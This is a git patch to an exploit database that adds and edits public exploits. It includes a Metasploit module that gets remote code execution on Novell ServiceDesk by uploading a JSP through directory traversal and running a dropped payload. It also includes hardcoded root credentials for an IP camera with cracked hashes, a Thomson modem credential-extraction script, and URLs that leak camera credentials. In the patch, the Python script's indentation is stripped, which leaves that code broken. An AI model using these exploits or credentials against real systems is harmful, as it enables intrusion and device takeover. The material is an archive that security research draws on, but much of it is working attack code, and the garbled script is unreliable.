From 29fc5c4082c97681a1c708a4a268a9a33dac6e6e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 19 Apr 2016 05:04:12 +0000 Subject: [PATCH] DB: 2016-04-19 5 new exploits Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64) WordPress leenk.me Plugin 2.5.0 - CSRF/XSS WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials Novell ServiceDesk Authenticated File Upload pfSense Community Edition 2.2.6 - Multiple Vulnerabilities --- files.csv | 7 +- platforms/hardware/dos/39706.txt | 39 +++ platforms/hardware/webapps/38067.py | 116 ++++---- platforms/hardware/webapps/38245.txt | 223 ++++++++-------- platforms/linux/local/33322.c | 2 + platforms/linux/local/33523.c | 2 + platforms/multiple/remote/39708.rb | 384 +++++++++++++++++++++++++++ platforms/php/webapps/39704.txt | 117 ++++++++ platforms/php/webapps/39705.txt | 133 ++++++++++ platforms/php/webapps/39709.txt | 145 ++++++++++ 10 files changed, 991 insertions(+), 177 deletions(-) create mode 100755 platforms/hardware/dos/39706.txt create mode 100755 platforms/multiple/remote/39708.rb create mode 100755 platforms/php/webapps/39704.txt create mode 100755 platforms/php/webapps/39705.txt create mode 100755 platforms/php/webapps/39709.txt diff --git a/files.csv b/files.csv index b8eacd954..a86d46302 100755 --- a/files.csv +++ b/files.csv @@ -8567,7 +8567,7 @@ id,file,description,date,author,platform,type,port 9080,platforms/php/webapps/9080.txt,"Opial 1.0 (albumid) Remote SQL Injection Vulnerability",2009-07-02,"ThE g0bL!N",php,webapps,0 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 -9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 +9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64)",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0 @@ -35921,3 +35921,8 @@ id,file,description,date,author,platform,type,port 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 39702,platforms/linux/local/39702.rb,"Exim _perl_startup_ Privilege Escalation",2016-04-15,metasploit,linux,local,0 +39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 +39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80 +39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 +39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80 +39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443 diff --git a/platforms/hardware/dos/39706.txt b/platforms/hardware/dos/39706.txt new file mode 100755 index 000000000..fc3a9e893 --- /dev/null +++ b/platforms/hardware/dos/39706.txt @@ -0,0 +1,39 @@ +Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials +Date: 4/16/2016 +Exploit Author: DLY +Vendor: TENVIS Technology Co., Ltd +Product: TH692- Outdoor P2P HD Waterproof IP Camera +Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html +Affected version: TH692C-V. 16.1.16.1.1.4 +firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov + +user: Mroot +pass:cat1029 +user:Wproot +pass: cat1029 + +root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root +rootpath +rootfs crc %lx +------------------start upgrade rootfs------------------ +------------------end upgrade rootfs------------------ +bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext) +nfsroot +7root +Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot +k01000100 rootbox nohelp info +root::0: +Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh +Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh +nfsroot +pivot_root +xswitch_root +chroot +nfsroot +root@kali:~# john --show ipcamhashes +Mroot:cat1029:0:0::/root:/bin/sh +Wproot:cat1029:0:0::/root:/bin/sh + +2 password hashes cracked, 0 left + + diff --git a/platforms/hardware/webapps/38067.py b/platforms/hardware/webapps/38067.py index 707b8dc06..999b1482e 100755 --- a/platforms/hardware/webapps/38067.py +++ b/platforms/hardware/webapps/38067.py @@ -3,7 +3,7 @@ #+- #+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access #+- Date: October 22, 2013 -#+- Author: Glaysson dos Santos +#+- Author: 0rwelllabs #+- #+- Product: TWG850-4B Wireless VoIP Cable Modem #+- Software Version: ST9C.05.08 @@ -11,13 +11,14 @@ #+- BOOT Revision: 2.1.7i #+- Standard Specification Compliant: DOCSIS 2.0 #+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin -#+- Firmware Build Time 19:19:19 Thu Feb 17 2011 +#+- Firmware Build Time 19:19:19 Thu Feb 17 2011 #+- Severity: High #+- #+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ################################################################################ + import string import urllib2 import sys @@ -36,77 +37,74 @@ D_C = ("\033[0m" ) def banner(): - os.system('clear') - print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \ - \t- 2013 - Glaysson dos Santos (0cn1)\n\n" +os.system('clear') +print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \ + \t- 2013 - O_Orwelllabs\n\n" def hr_data(filename, min=4): - with open(filename, "rb") as f: - result = "" - for c in f.read(): - if c in string.printable: - result += c - continue - if len(result) >= min: - yield result - print >> log, result - result = "" - print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save) +with open(filename, "rb") as f: + result = "" + for c in f.read(): + if c in string.printable: + result += c + continue + if len(result) >= min: + yield result +print >> log, result + result = "" +print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save) def checkcreds(router,username,password): - auth_handler = urllib2.HTTPBasicAuthHandler() - auth_handler.add_password(realm='Thomson', - uri = router, - user = username, +auth_handler = urllib2.HTTPBasicAuthHandler() +auth_handler.add_password(realm='Thomson', + uri = router, + user = username, passwd= password) - opener = urllib2.build_opener(auth_handler) - try: - urllib2.install_opener(opener) - status = urllib2.urlopen('%s/%s'%(router,refi)) - print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C) +opener = urllib2.build_opener(auth_handler) +try: + urllib2.install_opener(opener) + status = urllib2.urlopen('%s/%s'%(router,refi)) + print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C) - except urllib2.URLError, e: - if e.code == 401: - print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C) +except urllib2.URLError, e: + if e.code == 401: + print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C) def checkvuln(router): - try: - print '(+)- Checking if target is vulnerable...' - req = urllib2.Request('%s/%s'%(router,bifi)) - response = urllib2.urlopen(req) - page = response.read() - x = open(bifi,'wb') - x.write(page) - x.close() - sleep(1) - print '(+)- The target appears to be vulnerable, lets check it better!' - print '(+)- Searching Credentials...' - sleep(1) - for s in hr_data(bifi): - try: - dec = base64.decodestring(s) - if dec.find(':') != -1: - user,passwd = dec.split(':') - print '(+)- User: %s%s%s'%(G_C,user,D_C) - print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C) - - print '(+)- Checking if creds are OK...' - checkcreds(router,user,passwd) - - except(binascii.Error): - pass - except urllib2.URLError, e: - print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C) - sys.exit(1) +try: +print '(+)- Checking if target is vulnerable...' +req = urllib2.Request('%s/%s'%(router,bifi)) +response = urllib2.urlopen(req) +page = response.read() +x = open(bifi,'wb') +x.write(page) +x.close() +sleep(1) +print '(+)- The target appears to be vulnerable, lets check it better!' +print '(+)- Searching Credentials...' +sleep(1) +for s in hr_data(bifi): +try: +dec = base64.decodestring(s) +if dec.find(':') != -1: +user,passwd = dec.split(':') +print '(+)- User: %s%s%s'%(G_C,user,D_C) +print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C) +print '(+)- Checking if creds are OK...' +checkcreds(router,user,passwd) +except(binascii.Error): +pass +except urllib2.URLError, e: +print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C) +sys.exit(1) if __name__ == "__main__": - banner() +banner() if len(sys.argv) != 2: print '[!] %sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C) sys.exit(2) - router = sys.argv[1] if not "http" in router: router = "http://"+(sys.argv[1]) - checkvuln(router) \ No newline at end of file + checkvuln(router) diff --git a/platforms/hardware/webapps/38245.txt b/platforms/hardware/webapps/38245.txt index 17910e9b2..b90be2da8 100755 --- a/platforms/hardware/webapps/38245.txt +++ b/platforms/hardware/webapps/38245.txt @@ -1,148 +1,137 @@ -1. *Advisory Information* +1. Adivisory Information Title: ADH-Web Server IP-Cameras Improper Access Restrictions +EDB-ID: 38245 +Advisory ID: OLSA-2015-0919 +Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html Date published: 2015-09-19 -Date of last update: 2015-09-19 -Vendors contacted: ADH-Web -Author: Glaysson dos Santos -Release mode: User release +Date of last update: 2016-02-15 +Vendors contacted: Dedicated Micros -2. *Vulnerability Information* + +2. Vulnerability Information Class: Information Exposure [CWE-200] -Impact: Security bypass +Impact: Access Control Bypass Remotely Exploitable: Yes Locally Exploitable: No -CVE Name: +CVE Name: N/A -3. *Vulnerabilities* -3.1 ADH-Web Server IP-Cameras Improper Access Restrictions +3. Vulnerability Description -3.1.1 Description +Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2]. -Due to improper access restriction the ADH-Web (item 4) device [1] allows a -remote attacker to browse and access arbitrary files from the following -directorie '/hdd0/logs'. you can also get numerous information -(important for a fingerprint step) via the parameter "variable" in -variable.cgi script. +Background: -3.1.2 Vulnerability Details +Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click. -Usually this directory can be protected against -unauthenticated access (401 Unauthorized), though, it can access all files -directly without requiring authentication.As in the statement below: -[401] -. 'http:///hdd0/logs' - [200] -. 'http:///hdd0/logs/log.txt' +4. Vulnerable Packages - Most common logfiles: - -. 'bak.txt -. 'connect.txt' -. 'log.txt' -. 'seclog.log' -. 'startup.txt' -. 'DBGLOG.TXT' -. 'access.txt' -. 'security.txt' - -3.1.3 Impact - -This could allow a remote attacker to obtain valuable information such as -access credentials, Network configuration and other sensitive information -in plain text. - -Another problem identified is an information exposure via the parameter -"variable" in variable.cgi script. Knowing some variables can extract a -reasonable amount of information. For exemplo: - -* DNS -. 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0' - -* ftp master ftp console credenthials ((the development team said that this -credential is not used, then why does it exist?): -. ' -http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 -' -. ' -http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 -' - -(although the vast majority of servers have ftp / telnet with anonymous -access allowed.) - -* alarms -. 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0' -* camconfig -. 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1' -(includes, but is not limited to) There are a lot of variables [an audit -tool is on the way]. - -This servers also sends credentials (and other sensitive data) via GET -parameters -This is poor practice as the URL is liable to be logged in any number of -places -between the customer and the camera. The credentials should be passed in -the body -of a POST request (under SSL of course, here is not the case). . -(Is possible to create, edit and delete users and other configurations in -this way, dangerous) - -4. *Vulnerable Products and Packages* - - . The following products are affected: - SD Advanced Closed IPTV - SD Advanced - EcoSense - Digital Sprite 2 -Other products/models are probably affected too, but they I not checked. -5. *Vendor Information, Solutions and Workarounds* -The vendor found that some things are not vulnerabilities (sensitive -information via GET, for example) -and others are useless (hardcoded credentials) and others are not yet so -critical (access to server logs). -I think that at least this information can assist during an intrusion test, -as will be shown soon. +5. Technical Description -6. *Credits* -This vulnerability was discovered by Glaysson dos Santos. +[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below: -7. *Report Timeline* +(401): http:///hdd0/logs +(200): http:///hdd0/logs/log.txt -. 2015-08-31: -Vendor has been notified about the vulnerabilities (without details yet). +> Most common logfiles: -. 2015-09-01: -Vendor acknowledges the receipt of the email and asks for technical -details. + arc_log.txt + bak.txt + connect.txt + log.txt + seclog.log + startup.txt + DBGLOG.TXT + access.txt + security.txt -. 2013-09-01: -A email with technical details is sent to vendor. +[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information: -. 2013-09-11: -Still no response, another email was sent to the Vendor requesting any -opinion on the reported problems. +> DNS: +http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0 -the following points were highlighted in this email: -* 1. No unauthenticated access [No web pages/URL parameters on the cameras -should be accessible without credentials.] -* 2. Credentials (and other sensitive data) via GET parameters -* 4. Use of hard-coded password -* 3. no SSL +> ftp master ftp console credentials: +http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 +http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 -. 2013-09-11: -The vendor reported that the matter was passed on to the team developed -and that it would contact me the following week (2015-09-14). +(although the vast majority of servers have ftp/telnet with anonymous access allowed.) -. 2013-09-14: -The development team responded by passing its consideration of the points -and -reported in accordance with this response the impact of these -vulnerabilities -is low and are no longer available unauthenticated using recent software -release (version 10212). +> alms +http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0 + +> camconfig +http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1 +(includes, but is not limited to) + +This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors). + + +6. Vendor Information, Solutions and Workarounds + +The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon. + + +7. Credits +These vulnerabilities has been discovered by Orwelllabs. + + +8. Report Timeline + +2015-08-31: Vendor has been notified about the vulnerabilities (without details yet). +2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details. +2015-09-01: A email with technical details is sent to vendor. +2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems. +2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14). + +2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212). + + +Legal Notices ++++++++++++++ +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this information. + + +About Orwelllabs +++++++++++++++++ +Orwelllabs is a security research lab interested in embedded device & webapp hacking. +We aims to create some intelligence around this vast and confusing picture that is the Internet of things. + + +-----BEGIN PGP PUBLIC KEY BLOCK----- +mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt +xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH +xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf +55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY +U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I +SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y +d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI +AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA +Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE +f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n +pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW +LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN +95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965 +AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf +ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U +gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm +tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK +6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc +TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb +DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30 +MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf +Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q +FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU +I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB +C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37 +=IZYl +-----END PGP PUBLIC KEY BLOCK----- diff --git a/platforms/linux/local/33322.c b/platforms/linux/local/33322.c index ca820e212..08e44eba1 100755 --- a/platforms/linux/local/33322.c +++ b/platforms/linux/local/33322.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. +*/ /****************************************************************************** * .:: Impel Down ::. diff --git a/platforms/linux/local/33523.c b/platforms/linux/local/33523.c index d892c1cbb..4cbdd68ea 100755 --- a/platforms/linux/local/33523.c +++ b/platforms/linux/local/33523.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/37806/info Linux kernel is prone to a local privilege-escalation vulnerability. @@ -7,6 +8,7 @@ Local attackers can exploit this issue to execute arbitrary code with kernel-lev Successful exploits will result in the complete compromise of affected computers. The Linux Kernel 2.6.28 and later are vulnerable. +*/ #ifndef _GNU_SOURCE # define _GNU_SOURCE diff --git a/platforms/multiple/remote/39708.rb b/platforms/multiple/remote/39708.rb new file mode 100755 index 000000000..01b1d741d --- /dev/null +++ b/platforms/multiple/remote/39708.rb @@ -0,0 +1,384 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell ServiceDesk Authenticated File Upload', + 'Description' => %q{ + This module exploits an authenticated arbitrary file upload via directory traversal + to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in + Windows and Linux installations of Novell ServiceDesk, as well as the Virtual + Appliance provided by Novell. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-1593' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ], + [ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ] + ], + 'Platform' => %w{ linux win }, + 'Arch' => ARCH_X86, + 'DefaultOptions' => { 'WfsDelay' => 15 }, + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'Novell ServiceDesk / Linux', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86 + } + ], + [ 'Novell ServiceDesk / Windows', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86 + } + ], + ], + 'Privileged' => false, # Privileged on Windows but not on (most) Linux targets + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 30 2016' + )) + + register_options( + [ + OptPort.new('RPORT', + [true, 'The target port', 80]), + OptString.new('USERNAME', + [true, 'The username to login as', 'admin']), + OptString.new('PASSWORD', + [true, 'Password for the specified username', 'admin']), + OptString.new('TRAVERSAL_PATH', + [false, 'Traversal path to tomcat/webapps/LiveTime/']) + ], self.class) + end + + + def get_version + res = send_request_cgi({ + 'uri' => normalize_uri('LiveTime','WebObjects','LiveTime.woa'), + 'method' => 'GET', + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + } + }) + + if res && res.code == 200 && res.body.to_s =~ /\

\Version \#([0-9\.]+)\<\/p\>/ + return $1.to_f + else + return 999 + end + end + + + def check + version = get_version + if version <= 7.1 && version >= 6.5 + return Exploit::CheckCode::Appears + elsif version > 7.1 + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Unknown + end + end + + + def pick_target + return target if target.name != 'Automatic' + + print_status("#{peer} - Determining target") + + os_finder_payload = %Q{<%out.println(System.getProperty("os.name"));%>} + + traversal_paths = [] + if datastore['TRAVERSAL_PATH'] + traversal_paths << datastore['TRAVERSAL_PATH'] # add user specified or default Virtual Appliance path + end + + # add Virtual Appliance path plus the traversal in a Windows or Linux self install + traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/']) + + # test each path to determine OS (and correct path) + traversal_paths.each do |traversal_path| + jsp_name = upload_jsp(traversal_path, os_finder_payload) + + res = send_request_cgi({ + 'uri' => normalize_uri('LiveTime', jsp_name), + 'method' => 'GET', + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies + }) + + if res && res.code == 200 + if res.body.to_s =~ /Windows/ + @my_target = targets[2] + else + # Linux here + @my_target = targets[1] + end + if traversal_path.include? '/srv/tomcat6/webapps/' + register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) + else + register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) + end + return traversal_path + end + end + + return nil + end + + + def upload_jsp(traversal_path, jsp) + jsp_name = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp" + + post_data = Rex::MIME::Message.new + post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"") + data = post_data.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(@upload_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if not res && res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...") + else + return jsp_name + end + end + + + def create_jsp + opts = {:arch => @my_target.arch, :platform => @my_target.platform} + payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch) + exe = generate_payload_exe(opts) + base64_exe = Rex::Text.encode_base64(exe) + + native_payload_name = rand_text_alpha(rand(6)+3) + ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' + + var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) + var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) + var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) + var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) + var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) + var_path = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) + + if @my_target['Platform'] == 'linux' + var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) + chmod = %Q| + Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); + Thread.sleep(200); + | + + var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) + cleanup = %Q| + Thread.sleep(200); + Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); + | + else + chmod = '' + cleanup = '' + end + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + <% + try { + String #{var_buf} = "#{base64_exe}"; + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + + File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); + + BufferedOutputStream #{var_ostream} = + new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); + #{chmod} + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + #{cleanup} + } catch (Exception e) { + } + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + jsp = jsp.gsub(/\x0d\x0a/, "") + jsp = jsp.gsub(/\x0a/, "") + + return jsp + end + + + def exploit + version = get_version + + # 1: get the cookies, the login_url and the password_form and username form names (they varies between versions) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + } + }) + + if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ + login_url = $2 + @cookies = res.get_cookies + if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/ + password_form = $1 + else + # we shouldn't hit this condition at all, this is default for v7+ + password_form = 'password' + end + if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/ + username_form = $1 + else + # we shouldn't hit this condition at all, this is default for v7+ + username_form = 'username' + end + else + fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.") + end + + # 2: authenticate and get the import_url + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(login_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'vars_post' => { + username_form => datastore['USERNAME'], + password_form => datastore['PASSWORD'], + 'ButtonLogin' => 'Login' + 